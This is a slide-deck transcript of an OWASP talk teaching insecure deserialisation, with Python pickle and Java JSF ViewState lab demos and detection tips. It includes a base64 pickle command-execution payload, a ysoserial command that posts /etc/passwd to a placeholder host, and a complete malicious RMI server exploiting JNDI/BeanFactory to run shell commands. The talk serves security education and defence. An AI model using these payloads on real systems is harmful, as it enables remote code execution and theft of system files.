Why So Serial. Demystifying Insecure Deserialisation

Transcript

1. Jan 30, 2022 OWASP Vellore Why So Serial? DEMYSTIFYING INSECURE

   DEMYSTIFYING INSECURE DEMYSTIFYING INSECURE DESERIALISATION DESERIALISATION DESERIALISATION

2. root_js jeyaseelan86 Why So Serial ? Demystifying Insecure Deserialisation $

   whoami Jeya Seelan Security Researcher. Bug Hunter. Team Tamil Security Hub. Information Security Engineer, Zoho.

3. Let's get started! Are you ready?

4. Why So Serial ? Demystifying Insecure Deserialisation Today's Agenda 3

   6 Questions What can go wrong 1 Preface 4 Demo Time 2 Serialisation what? why? where? 5 Deserialization

5. Object Oriented Programming Preface Object-Oriented Programming is all about creating

   “objects”. An object is a group of interrelated variables and functions. These variables are often referred to as properties of the object and functions are referred to as the behavior of the objects. Example Human Object Height, Name, Age, Gender, Mother Tongue, etc...

6. HUMAN OBJECT Height : 170 cm Age : 25 Name

   : Kumar Gender : Male PROBLEM ?? We need to store or send the object without altering the state of Human object.

7. THE SOLUTION SERIALIZATION

8. What? Why? Where? SERIALISATION

9. What? Serialization is the process of converting an object state

   into a format that can be transmitted or stored. It is also known as Marshalling or pickling Many popular programming languages have serialization support included in the language core or in the standard library.

10. Why? Objects are composed of several components, saving or delivering

    all the parts typically requires significant coding effort, so serialization is a standard way to capture the object into a sharable format. 👉🏻 Easy to transfer 👉🏻 Reversible to original form 👉🏻Persist State

11. Where? transferring data through the wires (messaging). storing data (in

    databases, on hard disk drives). remote procedure calls, e.g., as in SOAP. Caching and Persistence HTTP cookies, View State

12. HUMAN OBJECT Height : 170 cm Age : 25 Name

    : Kumar Gender : Male GovtID : AABBCC Serialisation {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"}

13. DESERIALISATION Deserialization is the opposite of serialization. Deserialization is the

    process of reconstructing a data structure or object from a series of bytes or a string.

14. HUMAN OBJECT Height : 170 cm Age : 25 Name

    : Kumar Gender : Male GovtID : AABBCC {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"M ale","GovtID":"AABBCC"} Deserialisation

15. WHAT CAN GO WRONG? HUMAN OBJECT Height : 170 cm

    Age : 25 Name : Kumar Gender : Male GovtID : AABBCC

16. HUMAN OBJECT Height : 170 cm Age : 25 Name

    : Kumar Gender : Male GovtID : QQWWEE {object:Human, "Height":"170","Age":"25", "Name":"Kumar","Gender":"Male", "GovtID":"QQWWEE"} Deserialisation MANIPULATED SERIALISED DATA MODIFIED OBJECT Insecure
17. None
18. None

19. DEMO TIME !

20. DEMO - I PYTHON DESERIALISATION To Setup the Lab docker

    pull jeyaseelan86/pydeser:pickle

21. Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

22. Python Serialisation and Deserialisation http://localhost:4444/convert?score=44&name=ss

23. EXPLOIT gASVOAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjB10b3VjaCBoYWNrZWRieWRlc2VyaWFsaXNhdGlvbpSFlFKULg==

24. DEMO - II JAVA JSF VIEWSTATE DESERIALISATION To Setup the

    Lab docker pull jeyaseelan86/javadeser:jsf

25. JSF Viewstate Deserialisation

26. JSF Viewstate Deserialisation

27. JSF Viewstate Deserialisation

28. JSF Viewstate Deserialisation

29. JSF Viewstate Deserialisation

30. JSF Viewstate Deserialisation

31. JSF Viewstate Deserialisation java -jar ysoserial-master-8eb5cbfbf6-1.jar Jdk7u21 "curl -d @/etc/passwd

    http://ip"

32. JSF Viewstate Deserialisation

33. DETECTING INSECURE DESERIALISATION

34. WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

35. WHITE BOX APPROACH JAVA ObjectInputStream with readObject Use of readObject,

    readObjectNodData, readResolve or readExternal XMLdecoder with external user defined parameters Serializable

36. BLACK BOX APPROACH JAVA AC ED 00 05 in HEX

    H4sIAAAAAAAAAJ in GZIP Base64 rO0 in Base64 Content-type header application/x-java-serialized- object

37. WHITE BOX APPROACH PYTHON pickle.loads() marshall.loads() pyyaml.loads() jsonpickle.decode()

38. DETECTION TOOLS JAVA - YSOSERIAL, MARSHALLSEC , JEXBOSS .NET -

    YSOSERIAL.NET PYTHON - DESER-PY

39. NOTABLE BUGS 1 pickle 3 pyyaml deser 5 Xtreme Object

    Deser 2 Deserilisation in oracle weblogic , JBoss, jenkins etc.. 4 Ruby Deserialisation 6 Jackson Deserialisation

40. BONUS

41. import java.rmi.registry.*; import com.sun.jndi.rmi.registry.*; import javax.naming.*; import org.apache.naming.ResourceRef; public class

    EvilRMIServerNew { public static void main(String[] args) throws Exception { System.out.println("Creating evil RMI registry on port 1097"); Registry registry = LocateRegistry.createRegistry(1097); //prepare payload that exploits unsafe reflection in org.apache.naming.factory.BeanFactory ResourceRef ref = new ResourceRef("javax.el.ELProcessor", null, "", "", true,"org.apache.naming.factory.BeanFactory",null); //redefine a setter name for the 'x' property from 'setX' to 'eval', see BeanFactory.getObjectInstance code ref.add(new StringRefAddr("forceString", "x=eval")); //expression language to execute 'nslookup jndi.s.artsploit.com', modify /bin/sh to cmd.exe if you target windows ref.add(new StringRefAddr("x", "\"\".getClass().forName(\"javax.script.ScriptEngineManager\").newInstance().getEngineByName(\"JavaScript\").eval(\"new java.lang.ProcessBuilder['(java.lang.String[])'](['/bin/sh','-c','nslookup jndi.s.artsploit.com']).start()\")")); ReferenceWrapper referenceWrapper = new com.sun.jndi.rmi.registry.ReferenceWrapper(ref); registry.bind("Object", referenceWrapper); } }

42. Questions ? Shoot your Doubts?

43. Thank you! Have a great day ahead.

44. Reach me on ! @root_js @jeyaseelans @jeyaseelans86 @dramatic_admin